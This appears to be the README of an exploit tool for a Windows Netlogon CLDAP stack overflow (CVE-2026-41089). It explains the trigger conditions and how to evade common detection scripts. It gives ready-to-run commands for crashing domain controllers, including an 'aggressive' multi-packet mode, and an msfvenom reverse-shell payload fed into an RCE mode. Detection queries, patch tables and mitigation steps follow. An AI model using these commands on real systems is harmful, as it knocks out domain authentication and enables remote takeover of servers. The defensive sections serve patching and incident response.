
CVE-2026-41089 是 Windows Netlogon 服务中一个关键的远程代码执行漏洞,单包即可崩溃 lsass.exe,导致域控制器在约 30-60 秒内重启。此期间该 DC 的所有域认证将失败。
CVE-ID: CVE-2026-41089
CVSS: 9.8 (Critical)
CWE: CWE-121 (Stack-based Buffer Overflow)
Attack Vector: UDP/389 (CLDAP SearchRequest)
Impact: Remote Code Execution (RCE) / Denial of Service (DoS)
Affected Versions: Windows Server 2012 R2 ~ 2025 (Domain Controllers)
Patch: May 2026 Cumulative Update
The NetpLogonPutUnicodeString function in netlogon.dll contains a stack buffer overflow vulnerability when processing CLDAP search requests. The function receives a byte-length budget but interprets it as a WCHAR count, causing the write amount to be 2x the expected size.
The overflow occurs in the 528-byte (264 ushort) fixed stack buffer of the NlGetLocalPingResponse function. The attacker-controlled User field combined with the server's own DNS domain name fills this buffer, ultimately overwriting the GS security cookie, leading to __report_gsfailure and a crash of lsass.exe.
NtVer=0x02 in the CLDAP SearchRequest (forces use of the legacy, vulnerable BuildSamLogonResponse path)User field length ≥ ~130 characters (binary upper limit approximately 260 bytes UTF-16)Note:
NtVer=0x16(the value used by many public detection scripts) triggers the safeBuildSamLogonResponseExpath and does not trigger the vulnerability.
| Mode | Description |
|---|---|
--mode dos | Sends a crafted CLDAP packet, causing LSASS to crash and the DC to reboot (~60 seconds of authentication disruption) |
--mode rce | Attempts remote code execution (research-grade, requires shellcode) |
--mode scan | Scans responses for different NtVer values to fingerprint the target DC |
--mode auto | Automatically detects and selects the best attack strategy |
A single packet can crash lsass.exe, causing the domain controller to reboot within approximately 30-60 seconds. During this period, all domain authentication for that DC will fail.
# Basic usage — send 3 packets
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode dos
# Single-packet quick attack
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 1
# Aggressive mode — 5 concurrent packets
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 5 --delay 0.1
⚠️ Research-grade — unreliable and unstable in real-world environments.
RCE faces the following challenges:
# Generate shellcode
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 \
-f raw -o shellcode.bin
# Send RCE chain
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode rce \
--shellcode-file shellcode.bin --lhost 10.0.0.5 --lport 4444
# Fingerprint the target DC
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode scan
Example expected output (patched target):
NtVer=0x00000002 → RESPONDED (3 ms)
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)
Example expected output (unpatched target):
NtVer=0x00000002 → TIMEOUT (5001 ms) ← LSASS crashed!
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)
If NtVer=0x02 times out while other versions respond normally, the target is very likely vulnerable.
| Parameter | Description | Default |
|---|---|---|
-l, --user-len | Username field length (ASCII characters) | 180 |
--ntver | NtVer value (hex, e.g. 0x02) | 0x02 |
--count | Number of DoS packets to send | 3 |
--delay | Delay between packets (seconds) | 0.5 |
-t, --timeout | Socket timeout (seconds) | 5.0 |
--json | Output results in JSON format | — |
--raw | Print raw packet hex before sending | — |
--quiet | Suppress banner output | — |
--shellcode-file | Custom shellcode file (raw x64) | — |
--lhost | Reverse shell listener address | — |
--lport | Reverse shell listener port | 4444 |
# Create a long-domain-name DC on Windows Server (unpatched):
# 1. Promote to domain controller (a domain with a very long DNS domain name, e.g. "this-is-a-very-long-domain-name-for-testing.corp.local")
# 2. Confirm that patches prior to May 2026 are installed
# 3. Run from the attack machine:
python CVE-2026-41089-exp.py <DC_IP> <LONG_DOMAIN_NAME> --mode dos --count 1
# 4. Observe the DC crash and reboot
User > 100 bytes and NtVer = 0x02Event ID: 1000
Faulting process: lsass.exe
Faulting module: netlogon.dll
Exception code: 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN)
index=wineventlog source="WinEventLog:Application" EventID=1000
Process_Name="lsass.exe" Exception_Code="0xc0000409"
Event
| where Source == "Application" and EventID == 1000
| where RenderedDescription contains "lsass.exe"
| where RenderedDescription contains "0xc0000409"
| Windows Server Version | Patched Build Number | Notes |
|---|---|---|
| Server 2012 | 6.2.9200.26079 | ESU |
| Server 2012 R2 | 6.3.9600.23181 | ESU |
| Server 2016 | 10.0.14393.9140 | |
| Server 2019 | 10.0.17763.8755 | |
| Server 2022 | 10.0.20348.5074 | |
| Server 2022 23H2 | 10.0.25398.2330 | |
| Server 2025 | 10.0.26100.32772 |
# Safe detection script — will not crash the target
python detect_CVE-2026-41089.py <DC_IP> <DOMAIN>
# JSON output (suitable for batch scanning)
python detect_CVE-2026-41089.py 10.0.0.10 corp.local --json
# Show patch verification steps
python detect_CVE-2026-41089.py 10.0.0.10 corp.local --check-patch
Detection principle: Send short CLDAP requests with NtVer=0x02 (triggers the vulnerable path) and NtVer=0x16 (safe path). If 0x02 times out but 0x16 responds normally, the target is very likely vulnerable.
Install the patch immediately: May 2026 Cumulative Update (KB5058405 or later)
# Check installed updates
Get-HotFix | Where-Object {$_.InstalledOn -gt '2026-05-01'}
# Install the latest updates
Install-WindowsUpdate -AcceptAll -AutoReboot
Verify the netlogon.dll version:
(Get-Item C:\Windows\System32\netlogon.dll).VersionInfo.FileVersion
# Compare against the patch version table above
Temporary mitigation (when patching cannot be done immediately):
Post-incident investigation:
# Check lsass crash records
Get-WinEvent -FilterHashtable @{LogName='Application';Id=1000} |
Where-Object {$_.Message -match 'lsass.exe' -and $_.Message -match '0xc0000409'} |
Select-Object TimeCreated, Message -First 5